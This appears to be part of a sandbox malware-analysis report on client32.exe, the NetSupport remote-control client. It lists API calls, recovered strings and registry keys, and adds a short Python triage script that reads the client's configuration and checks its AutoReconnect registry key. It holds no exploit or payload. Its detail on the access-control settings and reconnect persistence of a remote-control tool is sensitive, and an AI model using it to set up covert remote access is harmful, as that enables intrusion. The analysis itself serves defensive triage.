                                                          • Part of subcall function 110D55B0: OutputDebugStringA.KERNEL32(111D8BD0,000000FF,NsAppSystem::CNsAsException::CNsAsException,0000002B,111D8BD0,00000000,000000FF,82E0FB89,?,00000000,00000000,?,?,?,00000000,111761AB), ref: 110D5663
                                                          • Part of subcall function 110D55B0: OutputDebugStringA.KERNEL32(1118BEE8,?,?,?,00000000,111761AB,000000FF,?,110D2C63,?,Invalid Server paramters), ref: 110D566A
                                                        Strings
                                                        • Connect() the socket is not closed, xrefs: 110CD08D
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLast$DebugOutputString$CriticalEnterExceptionException@8RaiseSectionThrow_memmoveconnectgethostbynamehtonssocket
                                                        • String ID: Connect() the socket is not closed
                                                        • API String ID: 2474459257-1125742345
                                                        • Opcode ID: b1656292a129f8f09a8c7e2961585d639d76e0250c0e1a8987911da478ec1647
                                                        • Instruction ID: ccd0812ce5c4b190832bbbc4611eee6a3b7bdca2a255a4473ecf135b367f79d4
                                                        • Opcode Fuzzy Hash: b1656292a129f8f09a8c7e2961585d639d76e0250c0e1a8987911da478ec1647
                                                        • Instruction Fuzzy Hash: 40417F75D00609AFDB10DFA4C984B9EF7B4FF48B14F10465EE826A7280EB34AA04CF94
                                                        APIs
                                                          • Part of subcall function 11133F90: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11182A50), ref: 11133FFD
                                                          • Part of subcall function 11133F90: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110291B), ref: 1113403E
                                                          • Part of subcall function 11133F90: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1113409B
                                                        • wsprintfA.USER32 ref: 110591DE
                                                        • CloseHandle.KERNEL32(?), ref: 11059228
                                                        • WaitForInputIdle.USER32(?,00001388), ref: 1105923D
                                                        • Sleep.KERNEL32(00000064), ref: 11059271
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FolderPath$CloseFileHandleIdleInputModuleNameSleepWaitwsprintf
                                                        • String ID: %s%s$Cobrowse FindWindow ret %x$Cobrowse WaitForInputIdle ret %x$NSMCobrMain$NSMCobrProxy$client32.exe /cobrowse
                                                        • API String ID: 1983868302-3988794623
                                                        • Opcode ID: 6c1afc4eae45db93175f885578682ff7c5dcd0a4c08b2a706085d4d78dcd34c2
                                                        • Instruction ID: 64ff9cb93a9663605cfd89a277c98985d389e2c617dc2113b1a8173dc2104267
                                                        • Opcode Fuzzy Hash: 6c1afc4eae45db93175f885578682ff7c5dcd0a4c08b2a706085d4d78dcd34c2
                                                        • Instruction Fuzzy Hash: ED41B275E00305AFDB60DF64CC85FDAB7F5EB49748F0085A9FA19A7280EB70A900CB61
                                                        APIs
                                                        • wsprintfA.USER32 ref: 11015588
                                                        • LoadCursorA.USER32(00000000,00007F00), ref: 110155E4
                                                        • RegisterClassA.USER32(00000003), ref: 110155FE
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        • CreateWindowExA.USER32(00000008,NSMIdentifyWnd,?,90000000,?,?,?,?,00000000,00000000,00000000), ref: 1101565F
                                                        • UpdateWindow.USER32(00000000), ref: 110156AD
                                                        • SetTimer.USER32(00000000,00000001,?,00000000), ref: 110156E0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Windowwsprintf$ClassCreateCursorErrorExitLastLoadMessageProcessRegisterTimerUpdate
                                                        • String ID: ..\ctl32\NSMIdentifyWnd.cpp$NSMIdentifyWnd$e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                        • API String ID: 1905683801-829434836
                                                        • Opcode ID: d3c1f65075277e3a1e6953d20af43a3d98eef37c275395219bf04279b5829960
                                                        • Instruction ID: 5d7763ff052535f15a435ab75112d1ab5b6a36c9cbb3a02e710fd65c9b1f1a2f
                                                        • Opcode Fuzzy Hash: d3c1f65075277e3a1e6953d20af43a3d98eef37c275395219bf04279b5829960
                                                        • Instruction Fuzzy Hash: 174131B5E00205AFDB11CFA9DC84BDEFBF8EB48308F10852AE518A7644E775A540CF95
                                                        APIs
                                                        • Sleep.KERNEL32(000001F4,000000D0,11043E30,00000000), ref: 1102B2F4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID: *channel$CLIENT32.CPP$Client$Eval$IsA()$SetChannel(%s), oldchan=<%s>$_License$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$gMain.cfg == m_cfg$licensee
                                                        • API String ID: 3472027048-3511930441
                                                        • Opcode ID: 83fb0e30d710a8545d2df3fc2a43f17ed3962404db71377e151b0bf2a2734884
                                                        • Instruction ID: 4d6f59fa27967af7cb4369fcdfea8b63f9a66c189d59db9a75944a8f7c73a5dd
                                                        • Opcode Fuzzy Hash: 83fb0e30d710a8545d2df3fc2a43f17ed3962404db71377e151b0bf2a2734884
                                                        • Instruction Fuzzy Hash: 98717C38E00A06ABDB15DB95DC94FEEF775AF58708F508158E92177284DB70B904CBA1
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _memset_strncpy
                                                        • String ID: Client$SecurityKey$SecurityKey2$UseNTSecurity$UserNames$ValidAddresses.
                                                        • API String ID: 3140232205-3449891838
                                                        • Opcode ID: 590b2bcb691e3b6a15250803a6b5b66dbbf136148ffd1a16c0b18f4875028790
                                                        • Instruction ID: 08675ffc2996a9994ec77ae635d004e2547b145dc9a4bb826478d0f5d07006d3
                                                        • Opcode Fuzzy Hash: 590b2bcb691e3b6a15250803a6b5b66dbbf136148ffd1a16c0b18f4875028790
                                                        • Instruction Fuzzy Hash: 4461D97590061B9FD711CF28DD94FDAB7A8AF95308F0481D4E99997241EB70FA48CBD0
                                                        APIs
                                                        • WaitForSingleObject.KERNEL32(?,000003E8,82E0FB89,?,?), ref: 11055599
                                                        • EnterCriticalSection.KERNEL32(?,?,?), ref: 11055620
                                                        • timeGetTime.WINMM(?,?), ref: 1105564C
                                                        • LeaveCriticalSection.KERNEL32(?,?,?), ref: 110556FA
                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?), ref: 11055714
                                                        • LeaveCriticalSection.KERNEL32(?,?,?), ref: 11055739
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalSection$EnterLeave$ObjectSingleTimeWaittime
                                                        • String ID: _License$maxslaves
                                                        • API String ID: 2566820294-253336860
                                                        • Opcode ID: 85b39d58914408d7a163e2829e83e83e104effb36fc5577ab1e2f1b96c7350b9
                                                        • Instruction ID: 48dbc85ab943934b8a84466f30def54263bd35f2e1c3ca06f7287a6687e73580
                                                        • Opcode Fuzzy Hash: 85b39d58914408d7a163e2829e83e83e104effb36fc5577ab1e2f1b96c7350b9
                                                        • Instruction Fuzzy Hash: 18619E75E01656DFDBC1CFA5D8C4B5AB7B8FB48708F0445A9E815D7244EB31A800CBA0
                                                        APIs
                                                        • GetOverlappedResult.KERNEL32(?,82E0F949,FFFFFFFF,00000001), ref: 1100B78C
                                                        • GetLastError.KERNEL32 ref: 1100B796
                                                        • GetTickCount.KERNEL32 ref: 1100B7F9
                                                        • wsprintfA.USER32 ref: 1100B836
                                                        • ResetEvent.KERNEL32(?), ref: 1100B8EF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CountErrorEventLastOverlappedResetResultTickwsprintf
                                                        • String ID: Audio$Hook_bits_per_sample$Hook_channels$New hooked channels,bitspersample=%d,%d (old %d,%d)
                                                        • API String ID: 3598861413-432254317
                                                        • Opcode ID: 5a65eb48652872d5814f4f76bc611f026241ddcf49cf48a664d38855d5c02a46
                                                        • Instruction ID: db9b1c3ef7ce759150f8a04d918defbb80db3967ff41a2750ff19611511fa969
                                                        • Opcode Fuzzy Hash: 5a65eb48652872d5814f4f76bc611f026241ddcf49cf48a664d38855d5c02a46
                                                        • Instruction Fuzzy Hash: 965107B9D00A06ABE710DF64CC84ABBB7F8FF45318F448119F56A92281E734B940C765
                                                        APIs
                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11025323
                                                          • Part of subcall function 1107C480: _strrchr.LIBCMT ref: 1107C48E
                                                          • Part of subcall function 110EAB20: LoadLibraryA.KERNEL32(Kernel32.dll,82E0FB89,00000002,00000000,00000000), ref: 110EAB5F
                                                          • Part of subcall function 110EAB20: GetCurrentProcessId.KERNEL32 ref: 110EABAA
                                                          • Part of subcall function 110EAB20: GetProcAddress.KERNEL32(?,ProcessIdToSessionId), ref: 110EABB7
                                                          • Part of subcall function 110EAB20: FreeLibrary.KERNEL32(?), ref: 110EAC54
                                                        • wsprintfA.USER32 ref: 11025359
                                                        • wsprintfA.USER32 ref: 110253C5
                                                        • wsprintfA.USER32 ref: 110253FD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: wsprintf$Library$AddressCurrentFileFreeLoadModuleNameProcProcess_strrchr
                                                        • String ID: %d.exe$TraceModuleName$_Debug$trace$tracefile
                                                        • API String ID: 3659486034-589725905
                                                        • Opcode ID: a7275773bff2871041cdee74396cf3c916417c8c27af77f7b489e8b866625208
                                                        • Instruction ID: 1d59da684ea919fcfefad1fdef7527821daba306a369c67dcb23b03b15758af2
                                                        • Opcode Fuzzy Hash: a7275773bff2871041cdee74396cf3c916417c8c27af77f7b489e8b866625208
                                                        • Instruction Fuzzy Hash: 57410A35F0011A9BCB01DF659C44AFEF3A8DF8921DF5481A9ED8AD7241EE619944CBD0
                                                        APIs
                                                        • EnterCriticalSection.KERNEL32(?,82E0FB89,00000000,00000000,771B23A0,110553B7,00000000,00000000), ref: 11055168
                                                        • LeaveCriticalSection.KERNEL32(?), ref: 1105528A
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        • RegOpenKeyExA.ADVAPI32(-80000002,SOFTWARE\Productive Computer Insight\Client32\AutoReconnect,00000000,0002001F,?), ref: 1105521D
                                                        • RegDeleteValueA.ADVAPI32(?,?), ref: 1105523D
                                                        • RegCloseKey.ADVAPI32(?), ref: 11055247
                                                        • SetEvent.KERNEL32(?), ref: 11055280
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalSection$CloseDeleteEnterErrorEventExitLastLeaveMessageOpenProcessValuewsprintf
                                                        • String ID: CltReconn.cpp$SOFTWARE\Productive Computer Insight\Client32\AutoReconnect$gMain.pReconnThread
                                                        • API String ID: 1302350719-2578778249
                                                        • Opcode ID: 1ed26ea936be5e88d747cbffeef235a5e33d6034bfc5ea2ba229771a93fa66eb
                                                        • Instruction ID: ce719fab2f9905b832c3f41bb8e1db8fccc4b13b2a84366b11d07be144a05397
                                                        • Opcode Fuzzy Hash: 1ed26ea936be5e88d747cbffeef235a5e33d6034bfc5ea2ba229771a93fa66eb
                                                        • Instruction Fuzzy Hash: 4141E476E00615AFDB81CFA4CCC0A9EBBA5FB46754F148269FD15DB240E736E901CB90
                                                        APIs
                                                        • DeleteCriticalSection.KERNEL32(75A37AB0,82E0FB89,?,75A37AA0,00000000,?,00000000,1116FF88,000000FF,?,110B7556), ref: 111031AA
                                                        • EnterCriticalSection.KERNEL32 ref: 111031F5
                                                        • SetEvent.KERNEL32(00000264), ref: 1110321E
                                                        • CloseHandle.KERNEL32(00000264), ref: 11103252
                                                        • WaitForSingleObject.KERNEL32(00000284,000000FF), ref: 11103260
                                                        • CloseHandle.KERNEL32(00000284), ref: 1110326D
                                                        • LeaveCriticalSection.KERNEL32(111DC080), ref: 111032AE
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalSection$CloseHandle$DeleteEnterErrorEventExitLastLeaveMessageObjectProcessSingleWaitwsprintf
                                                        • String ID: ..\ctl32\Refcount.cpp$idata->Q.size () == 0
                                                        • API String ID: 3524385308-424854974
                                                        • Opcode ID: bd65ad0157e7c5f0c241708b226ef3e10c76f8ac0d767ff1d6be5bb52270b901
                                                        • Instruction ID: 5537e226c3ed29ed2631099e1c940a9c2653324e19426985809a76b96a39e417
                                                        • Opcode Fuzzy Hash: bd65ad0157e7c5f0c241708b226ef3e10c76f8ac0d767ff1d6be5bb52270b901
                                                        • Instruction Fuzzy Hash: E8419179D156219FCB44DFA5D8C8A5BF7A4FB0B318B148A7DE82693744D730B400CBA0
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(psapi.dll,82E0FB89,?,?,00000000), ref: 110AB834
                                                        • EnumWindows.USER32(110AA9F0,?), ref: 110AB897
                                                        • GetRgnBox.GDI32(?,?), ref: 110AB8B5
                                                        • GdiFlush.GDI32 ref: 110AB8CD
                                                        • DeleteObject.GDI32(?), ref: 110AB8DB
                                                        • FreeLibrary.KERNEL32(?), ref: 110AB8F0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Library$DeleteEnumFlushFreeLoadObjectWindows
                                                        • String ID: Client$IgnoreScrapeApps$psapi.dll
                                                        • API String ID: 2450096840-2589157395
                                                        • Opcode ID: 75bedf2fc8f724d347e8135fc49e05a308359e9aee003c88a1db692aba27b468
                                                        • Instruction ID: bca5b5664efed83dbd9da041e75816698c7097caf9201845a9eb86541f09eb4f
                                                        • Opcode Fuzzy Hash: 75bedf2fc8f724d347e8135fc49e05a308359e9aee003c88a1db692aba27b468
                                                        • Instruction Fuzzy Hash: 1941C2B6D006599FCB10CFE9D884ADEFBB8FB09314F60866AE419A7240D730A944CF60
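                                                        The function records above recover the names of client32 configuration settings that the sample reads (Client: SecurityKey, SecurityKey2, UseNTSecurity, UserNames, ValidAddresses, IgnoreScrapeApps; _License: licensee, maxslaves; _Debug: trace, tracefile, TraceModuleName) and the HKLM registry key SOFTWARE\Productive Computer Insight\Client32\AutoReconnect that it opens and deletes a value from. The script below is an added triage example, not code from this report or from NetSupport: it pulls those settings out of an INI-style configuration and, on Windows, checks both registry views for the AutoReconnect key. The section-to-key grouping is inferred from how the strings are grouped in the String IDs, the label "access-control keys" rests on the names alone, and the sample configuration is constructed; all three are assumptions.

```python
import sys
import configparser

# Setting names recovered from the function analysis above, grouped by the INI
# section they appear alongside in the report's String IDs. The grouping is an
# assumption drawn from those string lists, not from NetSupport documentation.
WATCHED_KEYS = {
    "Client": ["SecurityKey", "SecurityKey2", "UseNTSecurity", "UserNames",
               "ValidAddresses", "IgnoreScrapeApps"],
    "_License": ["licensee", "maxslaves"],
    "_Debug": ["trace", "tracefile", "TraceModuleName"],
}

# [Client] keys whose names suggest they gate inbound control sessions
# (assumption based on the names only).
ACCESS_KEYS = ["SecurityKey", "SecurityKey2", "UseNTSecurity", "UserNames",
               "ValidAddresses"]

# Registry key the sample opens under HKLM (0x80000002) and deletes a value from.
AUTORECONNECT_KEY = r"SOFTWARE\Productive Computer Insight\Client32\AutoReconnect"

# Constructed sample configuration for demonstration; not taken from the sample.
SAMPLE_INI = """\
[Client]
SecurityKey=constructed-example-key
UseNTSecurity=0
ValidAddresses=
IgnoreScrapeApps=1

[_License]
licensee=EXAMPLE
maxslaves=9999

[_Debug]
trace=1
tracefile=client32.log
"""


def parse_ini(text):
    """Parse INI text; key matching is case-insensitive, values are left raw."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    return cp


def find_watched_settings(text):
    """Return {section: {key: value}} for every watched key present in text."""
    cp = parse_ini(text)
    found = {}
    for section, keys in WATCHED_KEYS.items():
        if not cp.has_section(section):
            continue
        hits = {k: cp.get(section, k) for k in keys if cp.has_option(section, k)}
        if hits:
            found[section] = hits
    return found


def missing_access_keys(text):
    """Sorted [Client] access-control keys that the configuration does not set."""
    cp = parse_ini(text)
    return sorted(k for k in ACCESS_KEYS
                  if not (cp.has_section("Client") and cp.has_option("Client", k)))


def autoreconnect_key_status():
    """On Windows, check both registry views for the AutoReconnect key and list
    its value names; return None on other platforms. The sample is 32-bit, so a
    64-bit Python must ask for the WOW6432 view explicitly."""
    if sys.platform != "win32":
        return None
    import winreg
    status = {}
    views = {"64-bit": winreg.KEY_WOW64_64KEY, "32-bit": winreg.KEY_WOW64_32KEY}
    for label, flag in views.items():
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, AUTORECONNECT_KEY,
                                0, winreg.KEY_READ | flag) as key:
                names = []
                index = 0
                while True:
                    try:
                        names.append(winreg.EnumValue(key, index)[0])
                        index += 1
                    except OSError:
                        break
                status[label] = names
        except FileNotFoundError:
            status[label] = None  # key absent in this view
    return status


if __name__ == "__main__":
    print(find_watched_settings(SAMPLE_INI))
    print("unset access keys:", missing_access_keys(SAMPLE_INI))
    print("AutoReconnect:", autoreconnect_key_status())
```

The registry check mirrors the sample's own RegOpenKeyExA(HKLM, ...) call but opens the key read-only and asks for both the 32-bit and 64-bit views, since a 32-bit client32.exe writes under WOW6432Node on 64-bit Windows and a 64-bit tool that checks only the native view would miss it. Run the script against a client32.ini recovered from the dropped files to see which of the settings above are actually set.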
                                                        APIs
                                                          • Part of subcall function 11134460: GetVersionExA.KERNEL32(111DC648,75A38400), ref: 11134490
                                                          • Part of subcall function 11134460: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 111344CF
                                                          • Part of subcall function 11134460: _memset.LIBCMT ref: 111344ED
                                                          • Part of subcall function 11134460: _strncpy.LIBCMT ref: 111345AF
                                                          • Part of subcall function 11134460: RegCloseKey.KERNEL32(00000000), ref: 111345BF
                                                        • LoadLibraryA.KERNEL32(secur32.dll,82E0FB89,?,?,?), ref: 11135751
                                                        • GetProcAddress.KERNEL32(00000000,GetUserNameExA), ref: 11135769
                                                        • timeGetTime.WINMM(?,?), ref: 1113577C
                                                        • timeGetTime.WINMM(?,?), ref: 11135793
                                                        • GetLastError.KERNEL32(?,?), ref: 11135799
                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 111357BB
                                                        Strings
                                                        Memory Dump Source
